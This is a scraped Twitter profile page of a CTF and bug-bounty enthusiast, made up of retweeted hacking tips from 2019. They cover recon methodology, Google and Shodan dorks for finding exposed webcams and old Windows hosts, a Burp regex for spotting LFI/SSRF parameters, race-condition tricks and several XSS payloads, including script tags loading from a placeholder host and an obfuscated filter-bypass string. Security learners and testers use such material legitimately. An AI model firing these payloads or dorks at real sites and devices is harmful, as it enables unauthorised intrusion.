Don't be script kiddie

@M0sabMusi0

Intrested in | CTF Lover Noob!

127.0.0.1
Vrijeme pridruživanja: travanj 2017.

Tweetovi

Blokirali ste korisnika/cu @M0sabMusi0

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @M0sabMusi0

  1. proslijedio/la je Tweet
    14. pro 2019.

    I am exploring fuzzing, started with this

    Poništi
  2. proslijedio/la je Tweet
    1. pro 2019.

    Some of my favourite Google dorks: inurl:aspx "search" Take some from: Then adding 'inurl:gov' can show some interesting results too.

    Poništi
  3. proslijedio/la je Tweet
    27. stu 2019.
    Poništi
  4. proslijedio/la je Tweet
    26. stu 2019.

    [] [1/n] I encountered child porn in a telegram channel. Here's how I found the admin - Went through group history, found 2 interesting links - Link #1 - A TG channel for android wallpapers - Link #2 - WhatsApp group invite for a group dedicated to looting Amazon deals

    Prikaži ovu nit
    Poništi
  5. proslijedio/la je Tweet
    24. stu 2019.

    [2/2] - Recon should be automated as much as it can be. Meanwhile, you can read their product/API docs, mess around - Make a checklist of components such as their session management, their checkout mechanism. Never use a vulnerability checklist unless its component based. - Hack

    Prikaži ovu nit
    Poništi
  6. proslijedio/la je Tweet
    24. stu 2019.

    My Methodology, an overview [1/2] - Use the product, see what it has to offer, note down the components that seem interesting - Take your time doing recon, don't rush. Find everything from the subdomains to what technologies they use from their job posting page.

    Prikaži ovu nit
    Poništi
  7. proslijedio/la je Tweet
    20. stu 2019.

    I M P O R T A N T This is a collection of nearly all known attack techniques against JWT. It also includes a tool to automate all checks and even a JWT primer.

    Poništi
  8. proslijedio/la je Tweet
    20. stu 2019.

    This technique is so useful, especially with race conditions ❤️ "send the whole of every request except the last byte, then, when they're all ready, 'release' each request by sending the last byte." Kudos to for his streak of awesome work.

    Poništi
  9. proslijedio/la je Tweet
    23. stu 2019.
    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    22. stu 2019.

    Shodan Cheat Sheet hostname: title:"webcam login" net:13.227.143.0/24 os:"windows xp" port:80 city:tokyo org:microsoft country:IN (use abbreviations such US and NZ) has_screenshot:true (only returns results that have a screenshot available

    Poništi
  11. proslijedio/la je Tweet
    26. stu 2019.

    Quick and dirty way to find parameters vulnerable to LFI & Path Traversal & SSRF & Open Redirect: Burp Search > Regex \?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w]) Suggestions are welcome.

    Prikaži ovu nit
    Poništi
  12. proslijedio/la je Tweet
    26. stu 2019.

    See-SURF: Python based scanner to find potential SSRF parameters

    Poništi
  13. Poništi
  14. proslijedio/la je Tweet
    7. stu 2019.

    New little recon tool - Automate the usage of MassDNS, Masscan, and nmap to filter out unreachable hosts + generate prepared lists of live URLs, IPs, domains, and services for further targeting.

    Poništi
  15. proslijedio/la je Tweet
    10. stu 2019.

    Arjun : HTTP parameter discovery suite (Typical scan takes 30 sec with huge list of 25,980 param' names) : cc

    Poništi
  16. Poništi
  17. proslijedio/la je Tweet
    5. stu 2019.

    Hacking Tools Cheat Sheet.

    Poništi
  18. proslijedio/la je Tweet
    6. stu 2019.

    All script-based vectors. (HTML, no events) <script>alert(1)// <script>alert(1)<!-- <script>alert(1)%0A--> <script src=data:,alert(1)> <script src=//HOST/FILE> <script src=https:DOMAIN/FILE> <svg><script xlink:href=//HOST/FILE> <svg><script xlink:href=https:DOMAIN/FILE>

    Prikaži ovu nit
    Poništi
  19. proslijedio/la je Tweet
    30. lis 2019.

    <scRiPt/💯<iMg="><">/*</sCRipt*<srC= */(prompt)``</ScripT

    Poništi
  20. proslijedio/la je Tweet
    30. lis 2019.

    XSS classification model - Types of Cross-Site Scripting

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·